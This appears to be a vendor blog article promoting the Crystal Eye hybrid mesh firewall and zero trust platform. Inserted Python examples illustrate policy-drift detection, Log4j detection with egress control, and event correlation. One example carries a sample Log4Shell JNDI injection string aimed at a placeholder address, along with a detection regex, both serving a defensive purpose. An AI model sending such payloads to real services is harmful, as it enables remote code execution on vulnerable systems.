Borderless Firewalling

Today’s networks are increasingly abstracted from the fibre and copper they run on. What constitutes a corporate network is no longer the buildings it resides in, nor the number of remote workers that connect daily. Network traffic is increasingly processed as a streaming workflow, and any given activity has numerous tributaries that flow along ever more complex pathways. Microservices, for example, are software functions that aggregate to form the service presented to the user.

What looks like old code is in fact many different components working from outside the traditional network perimeter. What was once a picture of a Medieval castle, with workers coming and going through gatehouses, has merged into a surrealist overlay of bodies and places.

The problem this presents, though, is not that there is too much information to decode the traffic; the problem is that the traffic has different modes in which it can traverse a network. Linear rules that determine who-goes-there can’t keep pace with the great many assassins in shepherd’s clothing.

The Strategic Value of Zero Trust Security Models

So, as perimeter-based security depreciates, a new geography of Zero Trust emerges. Ingress from anywhere, and egress to anywhere, passes through this space, which is a security-defined control plane abstracted from network traffic. Filtering at the perimeter now involves algorithms that oversee a lake of data.

This way, policy administration is brought as close to the action as possible. With the Crystal Eye platform, workflow is traced, marked and checked against entity behaviour analytics, the integrated risk registry and policies, as well as dynamic policy resulting from threat intelligence. At the data plane, over thirty-two hundred protocols can be processed out-of-the-box, while customisable protocol parsing supports bespoke Industrial Control Systems (ICS), including SCADA, and other IoT devices. This gives granular but also contextual control over authentication and authorisation, so that both human and non-human subjects receive least privilege on a per-transaction basis.

Borderless Firewalling: Enforcement at Every Edge

Borderless Firewalling, then, takes place at enforcement points, be they clients or servers, network gateways, or cloud brokering points. The Crystal Eye Attack Surface Reduction app (CEASR) is an example of a host-based point at which Zero Trust policy is enforced, while the Crystal Eye Hybrid Mesh Firewall extends firewalling to on-premises gateways, cloud-native gateways, and brokering points.

Network segmentation also creates enforcement points between zones, and when those zones are interconnected by an SD-WAN, the use of new protocols like WireGuard as a Software Defined Perimeter (SDP) controller provides a hybrid architecture with access to brokered resources rather than directly joining networks.

Without embracing the Zero Trust paradigm, Next-Generation Firewalls are as dead as disco. Many require add-ons to do so, but as a module within the Security Platform, the CE firewall achieves borderless latitude outright with its proprietary UCMI technology. Policy enforcement, the act of firewalling, will need to keep reaching around more and more corners.

Hybrid Mesh Firewall: The Security Reality

The architecture described so far is not new to Red Piranha, but the industry has only lately agreed on what to call it. Where this article speaks of Borderless Firewalling, analysts now speak of the Hybrid Mesh Firewall: a single security architecture that abandons the one-box-at-the-gate model in favour of many cooperating enforcement points, drawn together by a shared control plane and one common policy framework.

A firewall is no longer a place that traffic passes through; it is a property of the whole network, present wherever traffic is created, brokered or consumed.

What separates a Hybrid Mesh Firewall from a next-generation firewall wearing a few cloud add-ons is consistency. Every enforcement point, whether a branch appliance, a virtualised data centre, a cloud broker or a remote endpoint, must run the same inspection engine, answer to the same policy, and contribute to one shared pool of evidence.

Anything less reintroduces the seams that intruders have always been good at finding. Crystal Eye was built to this principle before the principle had a name, engineered as a single platform from the outset rather than a perimeter product later stretched to reach the cloud.

One Platform, Every Edge: Three Form Factors

Crystal Eye is delivered in three form factors. Each carries the identical feature set, the same IDPS ruleset, and the same management console, so a policy written once behaves the same wherever traffic meets it.

  • Hardware appliance. Purpose-built, made-to-order units spanning the Series 10 to Series 100 range, from small branch to carrier-grade. A single 2U device sustains 60 Gbps of IPS throughput, with active/passive high availability for failover that costs no downtime.
  • Virtual appliance. The complete platform delivered as software for VMware, Hyper-V and KVM environments, with full feature parity to hardware and no capability surrendered for the convenience. Sizing is flexible for data-centre and branch virtualisation, and provisioning is API-driven for lifecycle automation.
  • Cloud and FWaaS. Cloud-native enforcement through Crystal Eye Cloud and SASE Cloud, with multiple global points of presence, native AWS VPC integration, and Microsoft Entra ID (formerly Azure AD) identity-aware policy reaching into OneDrive, SharePoint and Exchange. This is where Zero Trust extends to microservices and the remote workforce.

Because the three are one platform rather than three products, an organisation can place enforcement wherever its traffic actually lives and move it as that picture changes without re-learning a console or accepting a thinner ruleset at whichever edge happened to be cheapest to deploy.

Crystal Eye Orchestrate: The Unified Control Plane

Enforcement spread across many points only works if something holds the whole picture together. That something is Crystal Eye Orchestrate, a cloud-delivered management plane that sits above every hardware, virtual and cloud deployment at once.

It is the control plane this article described in the abstract: policy administration brought as close to the action as possible, while remaining a single vantage point rather than a scattering of local consoles.

Orchestrate is a data lake in its own right, correlating events from every enforcement point and driving multi-tenant orchestration for MSP and MSSP partners. At its core is UCMI Object Policy Control, which manages services, hosts and domains simultaneously across every countermeasure.

The practical result is the elimination of policy drift, the slow divergence between what the on-premises gateway enforces, what the cloud gateway enforces, and what the remote endpoint enforces, which is one of the quieter ways a borderless network is breached. One object, changed once, takes effect everywhere.
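The drift described above can be made concrete with a small model. The following is an added illustration, not Crystal Eye or UCMI code: a central store of policy objects is the source of truth, each enforcement point holds a local copy, and drift is any object whose local copy differs from, or is missing from, the central one. The point names, the object and its members are all constructed values.

```python
"""Policy-drift detection across distributed enforcement points.

Added illustration (not Red Piranha's code).  The central store is the
source of truth; every enforcement point keeps a local copy.  Drift is a
local copy that differs from central, is missing, or exists only locally.
"""
from __future__ import annotations

import hashlib
import json
from dataclasses import dataclass, field


@dataclass(frozen=True)
class PolicyObject:
    """One policy object (host, domain or service) and the action bound to it."""
    name: str
    kind: str                 # "host", "domain" or "service"
    action: str               # "allow" or "deny"
    members: tuple[str, ...]  # addresses, FQDNs or port specs

    def digest(self) -> str:
        # Canonical JSON so two copies with equal content hash equally,
        # regardless of member ordering.
        payload = json.dumps(
            {"name": self.name, "kind": self.kind, "action": self.action,
             "members": sorted(self.members)},
            sort_keys=True)
        return hashlib.sha256(payload.encode()).hexdigest()


@dataclass
class EnforcementPoint:
    """A branch appliance, cloud gateway or endpoint agent and its local copy."""
    name: str
    objects: dict[str, PolicyObject] = field(default_factory=dict)

    def apply(self, obj: PolicyObject) -> None:
        self.objects[obj.name] = obj


def detect_drift(central: dict[str, PolicyObject],
                 points: list[EnforcementPoint]) -> dict[str, list[str]]:
    """Return {point name: [drifted object names]}.

    Points in full agreement with the central store are omitted."""
    report: dict[str, list[str]] = {}
    for point in points:
        drifted = []
        for name, obj in central.items():
            local = point.objects.get(name)
            if local is None or local.digest() != obj.digest():
                drifted.append(name)
        # Objects only the point knows about are drift too (stale locals).
        drifted.extend(set(point.objects) - set(central))
        if drifted:
            report[point.name] = sorted(drifted)
    return report


def publish(central: dict[str, PolicyObject], obj: PolicyObject,
            points: list[EnforcementPoint]) -> None:
    """Change the object once, centrally, and push it to every point."""
    central[obj.name] = obj
    for point in points:
        point.apply(obj)


def demo() -> tuple[dict[str, list[str]], dict[str, list[str]]]:
    """Constructed scenario: three points, one of which was edited locally."""
    c2_block = PolicyObject("known-c2", "domain", "deny",
                            ("bad.example", "c2.example"))
    central = {"known-c2": c2_block}
    points = [EnforcementPoint("hq-appliance"),
              EnforcementPoint("aws-gateway"),
              EnforcementPoint("remote-endpoint")]
    for p in points:
        p.apply(c2_block)
    # Someone "temporarily" dropped one domain on the cloud gateway only.
    points[1].apply(PolicyObject("known-c2", "domain", "deny", ("bad.example",)))
    before = detect_drift(central, points)
    # The fix is not to edit the gateway: re-publish the one central object.
    publish(central, c2_block, points)
    after = detect_drift(central, points)
    return before, after


if __name__ == "__main__":
    print(demo())
```

Running `demo()` reports the cloud gateway as drifted on `known-c2` before the re-publish and an empty report afterwards. The digest comparison is what makes the check cheap enough to run continuously: each point need only ship a name-to-digest map back to the control plane, not its whole policy.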

The detection behind those policies is substantial. The IDPS engine uses more than 80,000 professionally curated rules, updated daily by the Crystal Eye Security Operations Centre. Red Piranha also feeds Automated Actionable Intelligence directly into enforcement controls. This includes DNS-layer threat blocking, SSL/TLS deep packet inspection, and real-time discovery of IoT and cyber-physical devices, each with its own policy framework.

Integrated SOAR automatically handles low-risk events and escalates critical incidents for human and machine collaboration. At the same time, the DFIR application allows forensic investigations to begin directly within the platform, without switching tools.

Policing the Data Lake

Meanwhile, wayward activities within the data lake are what attract alerts, as coastguard-like policy administration inspects the session-specific tokens that permit passage. The wrong payload, flag, or heading will see traffic impounded at an enforcement point.

With the appropriate Security Platform, vulnerabilities like Log4j are not as easily exploited. Injected JNDI lookups would never reach attacker-controlled servers to retrieve malicious subroutines, so what would otherwise have been a trusted service can no longer further the installation and backdoor phases of the kill chain.
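Two enforcement points cooperate in the Log4j case just described: the inbound gateway that can spot the lookup string in a request, and the egress control that refuses the outbound directory connection even if the string got through. The block below is an added example, not Crystal Eye code, of both checks on constructed traffic; the zone name, the allow-list entries and the sample addresses are assumptions.

```python
"""Inbound lookup-string detection plus Zero Trust egress control.

Added illustration, not Red Piranha's code.  Zone names, allow-list
entries and sample traffic are constructed for the example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# A JNDI lookup as it appears in a logged header or form field.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Well-known ports of the directory/registry services a JNDI lookup
# resolves over (LDAP, LDAPS, RMI registry).
LOOKUP_PORTS = {389, 636, 1099}


@dataclass(frozen=True)
class Request:
    """An inbound HTTP request as seen at the web gateway."""
    src: str
    headers: tuple[tuple[str, str], ...]


@dataclass(frozen=True)
class Flow:
    """An outbound connection attempt from an internal zone."""
    src_zone: str
    dst: str
    dst_port: int


def inspect_request(req: Request) -> str:
    """Return 'impound' if any header value carries a JNDI lookup, else 'pass'."""
    for _name, value in req.headers:
        if JNDI_LOOKUP.search(value):
            return "impound"
    return "pass"


def inspect_egress(flow: Flow,
                   allow: dict[str, set[tuple[str, int]]]) -> str:
    """Default-deny egress: a zone may only reach the (destination, port)
    pairs it was explicitly granted.  Anything else is impounded; lookups
    to directory ports are labelled separately so the alert is specific."""
    granted = allow.get(flow.src_zone, set())
    if (flow.dst, flow.dst_port) in granted:
        return "pass"
    if flow.dst_port in LOOKUP_PORTS:
        return "impound:lookup-egress"
    return "impound"


def demo() -> dict[str, str]:
    """Constructed traffic: one benign and one injected request, then
    three outbound flows from the application-server zone."""
    allow = {
        # App servers may reach the corporate directory and the database.
        "app-servers": {("ldap.corp.example", 636), ("10.0.20.5", 5432)},
    }
    requests = {
        "req-benign": Request("198.51.100.7",
                              (("User-Agent", "Mozilla/5.0"),)),
        "req-injected": Request("198.51.100.8",
                                (("User-Agent", "${jndi:ldap://203.0.113.9/a}"),)),
    }
    flows = {
        "egress-corp-ldap": Flow("app-servers", "ldap.corp.example", 636),
        "egress-unknown-ldap": Flow("app-servers", "203.0.113.9", 389),
        "egress-unknown-https": Flow("app-servers", "203.0.113.10", 443),
    }
    verdicts = {k: inspect_request(r) for k, r in requests.items()}
    verdicts.update({k: inspect_egress(f, allow) for k, f in flows.items()})
    return verdicts


if __name__ == "__main__":
    for label, verdict in demo().items():
        print(f"{label:22s} {verdict}")
```

The egress rule is the one that matters most: the inbound regex is a best-effort signal that an obfuscated string can slip past, whereas the application server simply has no business opening a directory connection to an address it was never granted, and that decision does not depend on recognising the payload.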

One Policy Engine, Many Inputs

The challenge of detecting incursions, though, is as it ever was: logs and traffic can still be disguised. This is why the extended detection inputs that form a policy engine must be unified. Red Piranha’s proprietary UCMI policy controller achieves this as the central hub that correlates forensic evidence ingested by continuous diagnostics systems.

Indicators of Compromise (IOCs) are analysed against Tactics, Techniques, and Procedures (TTPs), as well as User and Entity Behaviour Analytics (UEBA), to produce a complex security mesh that tracks distributed workflow. What this means is that there are checks and balances applied to the bureaucracy of today’s network-aware systems.

Catching What Hides in the Payload

As a fundamental function of this apparatus, Remote Procedure Calls (RPCs) follow protocols that facilitate the execution of routines on remote systems. Yet these requests between machines are effectively disguised by stub compilers that unpackage the arguments parsed by the remote system. That system is then unaware of the caller, and logs the activity as its own.

This missing trace at endpoints is compounded when RPC calls are hidden within the payload of other protocols, like named pipes that carry common traffic, or are obfuscated and delivered out of order. So, to catch this activity, multiple points of detection are required. Verifying identity and access becomes more a question of whether the activity is typical and what supports that conclusion. Activity is checked against known techniques, as well as indicators like compromised addresses, domains and file hashes. Correlation occurs across the entire lake of activity, not just what is evident in a single transaction.
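The correlation the last two sections describe, a baseline of what is typical for a host combined with indicator matching, and a verdict drawn from events seen at different enforcement points rather than from one transaction, can be shown in a few dozen lines. The following is an added example and is not UCMI or Red Piranha code; the events, the per-host baseline of usual named-pipe peers, the indicator lists and the point names are all constructed.

```python
"""Cross-point correlation: an inbound named-pipe session that is atypical
for a host, followed within a time window by an indicator hit for the same
host, possibly observed at a different enforcement point.

Added illustration, not Red Piranha's UCMI.  Events, baselines and
indicators below are constructed for the example.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    ts: int       # seconds (constructed clock)
    point: str    # enforcement point that observed the event
    host: str     # internal host the event concerns
    kind: str     # "pipe_in" (inbound named-pipe session), "net_out", "proc"
    value: str    # peer address, destination domain/address, or file hash


# Constructed indicator lists, standing in for a threat-intelligence feed.
INDICATORS = {
    "addresses": {"203.0.113.9"},
    "domains": {"c2.example"},
    "hashes": {"ab" * 32},
}

# Constructed UEBA-style baseline: peers that normally open pipes to a host.
BASELINE_PEERS = {
    "fileserver01": {"10.0.5.10", "10.0.5.11"},
    "ws-12": {"10.0.5.10"},
}


def indicator_hit(ev: Event) -> str | None:
    """Single-transaction check: does this event touch a known indicator?"""
    if ev.kind == "net_out" and (ev.value in INDICATORS["addresses"]
                                 or ev.value in INDICATORS["domains"]):
        return f"indicator:{ev.value}"
    if ev.kind == "proc" and ev.value in INDICATORS["hashes"]:
        return f"indicator:hash {ev.value[:12]}"
    return None


def atypical_pipe(ev: Event) -> bool:
    """Behavioural check: an inbound pipe session from a peer outside the
    host's baseline is unusual, but on its own it is only a clue."""
    return ev.kind == "pipe_in" and ev.value not in BASELINE_PEERS.get(ev.host, set())


def correlate(events: list[Event], window: int = 300) -> dict[str, list[str]]:
    """Return {host: [reasons]} for hosts with an indicator hit, adding a
    'chain' reason when an atypical pipe session preceded the hit within
    `window` seconds, whichever points observed the two events."""
    by_host: dict[str, list[Event]] = defaultdict(list)
    for ev in events:
        by_host[ev.host].append(ev)
    findings: dict[str, list[str]] = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e.ts)
        pipes = [e for e in evs if atypical_pipe(e)]
        reasons = []
        for ev in evs:
            hit = indicator_hit(ev)
            if not hit:
                continue
            reasons.append(f"{ev.point}: {hit}")
            for p in pipes:
                if 0 <= ev.ts - p.ts <= window:
                    reasons.append(
                        f"chain: atypical pipe from {p.value} at {p.point} "
                        f"then {hit} at {ev.point} within {ev.ts - p.ts}s")
        if reasons:
            findings[host] = reasons
    return findings


def demo() -> dict[str, list[str]]:
    """Constructed event stream from an endpoint agent and a branch appliance."""
    events = [
        Event(100, "endpoint-agent", "fileserver01", "pipe_in", "10.0.5.77"),
        Event(160, "branch-appliance", "fileserver01", "net_out", "c2.example"),
        Event(105, "endpoint-agent", "ws-12", "pipe_in", "10.0.5.10"),
        Event(150, "branch-appliance", "ws-12", "net_out", "updates.example"),
        Event(200, "endpoint-agent", "ws-13", "pipe_in", "10.0.5.77"),
    ]
    return correlate(events)


if __name__ == "__main__":
    for host, reasons in demo().items():
        print(host, *reasons, sep="\n  ")
```

Only `fileserver01` is reported: the pipe session from an unfamiliar peer was seen by the endpoint agent and the outbound connection by the branch appliance, and neither event alone would have given the second reason. `ws-13` shows the same unusual pipe session but nothing follows it, so it stays a clue rather than a finding.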

Cybersecurity Mesh by Design

The security mesh invoked earlier in this article is not a metaphor reached for after the fact; it is the design. Gartner’s Cybersecurity Mesh Architecture calls for a composable model in which enforcement is distributed while data and control stay centralised, and Crystal Eye’s architecture pre-dates that definition rather than chasing it.

The architecture below shows how the Hybrid Mesh Firewall delivers: hardware appliances at headquarters, branches and data centres; cloud and FWaaS enforcement across AWS, Azure and the Crystal Eye SASE Cloud; and a remote workforce reached through ZTNA, SD-WAN and the CEASR endpoint application. Every part is a composable module, and every part answers to one Orchestrate data and control plane.

Crystal Eye Cybersecurity Mesh: distributed enforcement, one central data and control plane.

Within that mesh sit the platform’s integrated capabilities: NGFW with IPS and IDS; Crystal Eye Threat Detection, Investigation and Response across network and endpoint; SIEM and SOAR; DFIR; secure web and email gateways; DLP; SD-WAN; ZTNA; DNS security and IoT discovery. These are not point products bolted together, but functions of one platform drawing on a single store of evidence.

That common evidence base is what makes the correlation the earlier sections relied upon possible: a signal seen at a cloud broker can shape an enforcement decision on a branch appliance, because both are the same firewall in different clothes.

From Initial Vector to Wire-Speed Response

Spotting calls to ransomware command servers prevents the malware from obtaining the private keys it needs to hold data hostage. But when those keys are symmetrically encrypted and smuggled in with the original delivery, Zero Trust must be applied to prevent lateral movement and privilege escalation spreading from within.

This can be implemented with the Crystal Eye Hybrid Mesh Firewall capabilities, with UCMI and with hosts and zones linked to end users. Halting incursions at that initial attack vector is crucial to countermeasures in an open field ungoverned by perimeter rules. The ability to materialise at key locations is Borderless Firewalling.

This requires continuous detection across the entire lake of data that extends to the entire security mesh. With the Crystal Eye Security Platform and SOC (SOC-as-a-Service) in place, the necessary intelligence can be passed to the Crystal Eye at wire speed, turning a lowly grunt in the hierarchy of threat detection into that unsung responder who saves the day.

The perimeter is not coming back. Security can no longer be a place that traffic simply passes through. It now has to exist across the entire network, present at every edge at once.

That is what Borderless Firewalling has always described, and what the Hybrid Mesh Firewall now demands. For organisations, the question is no longer whether to adopt this model, but how to do so without creating gaps by stitching multiple point products together.

Crystal Eye addresses this with a single platform approach. The same inspection engine and policy framework operate across hardware, virtual, and cloud deployments, all unified through the Orchestrate control plane and one shared evidence store.

The result is consistent enforcement wherever workflow travels, correlation across the entire security mesh, and threat intelligence delivered to the firewall at wire speed. That is the strength of the Crystal Eye Hybrid Mesh Firewall: borderless reach with no seams left to exploit.

Last Updated: June 03, 2026